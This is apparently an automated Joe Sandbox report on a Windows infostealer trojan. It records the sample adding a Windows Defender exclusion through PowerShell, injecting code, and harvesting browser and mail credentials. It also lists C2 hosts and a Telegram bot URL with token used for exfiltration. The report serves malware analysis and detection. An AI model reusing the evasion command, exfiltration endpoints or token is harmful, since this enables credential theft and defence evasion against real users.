                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fe819bf4909f4e
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fb92ac426b8e0e
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fd0e60ec334a8d
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fe0fad0cf7a1b7
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------902a9c1b6845ea1<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fa5e6b963847a6
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------90254d5742aaecd<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fd84e1cfb2a118
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ff04e1c3336aea
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------9016ea1d21d3972
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ff8b21a81b5b3e
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------9007ffef7533e53
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------900128b0fc4b657
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory written: C:\Users\user\Desktop\Yef4EqsQha.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Users\user\Desktop\Yef4EqsQha.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR
                    Source: Yara match File source: 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                    Remote Access Functionality

                    Source: Yara match File source: 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR
                    Source: Yara match File source: 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 112 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 112 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Clipboard Data | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Behavior Graph ID: 1588250, Sample: Yef4EqsQha.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100
                    Graph signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
                    Domains: reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP); api.telegram.org: Uses the Telegram API (likely for C&C communication); 6 other IPs or domains
                    Yef4EqsQha.exe (started): dropped C:\Users\user\AppData\...\Yef4EqsQha.exe.log, ASCII; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes; started Yef4EqsQha.exe, powershell.exe, Yef4EqsQha.exe
                    Yef4EqsQha.exe (child): api.telegram.org 149.154.167.220, 443, 49834, 49884 TELEGRAMRU United Kingdom; checkip.dyndns.com 193.122.6.168, 49732, 49757, 49770 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.112.1, 443, 49744, 49751 CLOUDFLARENETUS United States; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                    powershell.exe (child): Loading BitLocker PowerShell Module; started WmiPrvSE.exe, conhost.exe

                    Source | Detection | Scanner | Label | Link
                    Yef4EqsQha.exe | 83% | ReversingLabs | Win32.Trojan.Leonem |
                    Yef4EqsQha.exe | 71% | Virustotal | | Browse
                    Yef4EqsQha.exe | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
                    s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
                    reallyfreegeoip.org | 104.21.112.1 | true | false | | high
                    api.telegram.org | 149.154.167.220 | true | false | | high
                    checkip.dyndns.com | 193.122.6.168 | true | false | | high
                    checkip.dyndns.org | unknown | unknown | false | | high
                    time.windows.com | unknown | unknown | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                    https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery | false | | high
                    http://checkip.dyndns.org/ | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://www.office.com/ | Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/chrome_newtab | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/ac/?q= | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org | Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot | Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://chrome.google.com/webstore?hl=en | Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.ecosia.org/newtab/ | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://varders.kozow.com:8081 | Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://go.mic | Yef4EqsQha.exe, 00000000.00000002.1384875417.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://aborters.duckdns.org:8081 | Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://ac.ecosia.org/autocomplete?q= | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451 | Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://51.38.247.67:8081/_send_.php?L | Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://anotherarmy.dns.army:8081 | Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://checkip.dyndns.org/q | Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Yef4EqsQha.exe, 00000000.00000002.1389923913.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    https://reallyfreegeoip.org/xml/ | Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.112.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588250
Start date and time: 2025-01-10 23:05:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Yef4EqsQha.exe
renamed because original name is a hash value
Original Sample Name: f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/8@5/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 98%
                                                                                        • Number of executed functions: 186
                                                                                        • Number of non-executed functions: 12
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.101.57.9, 199.232.210.172, 199.232.214.172, 13.107.246.45, 184.28.90.27, 52.149.20.212
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target Yef4EqsQha.exe, PID 7872 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
17:06:20 | API Interceptor | 6145675x Sleep call for process: Yef4EqsQha.exe modified
17:06:22 | API Interceptor | 13x Sleep call for process: powershell.exe modified
                                                                                                            87J30ulb4q.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.96.1
                                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.80.1
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0e3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            3pwbTZtiDu.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
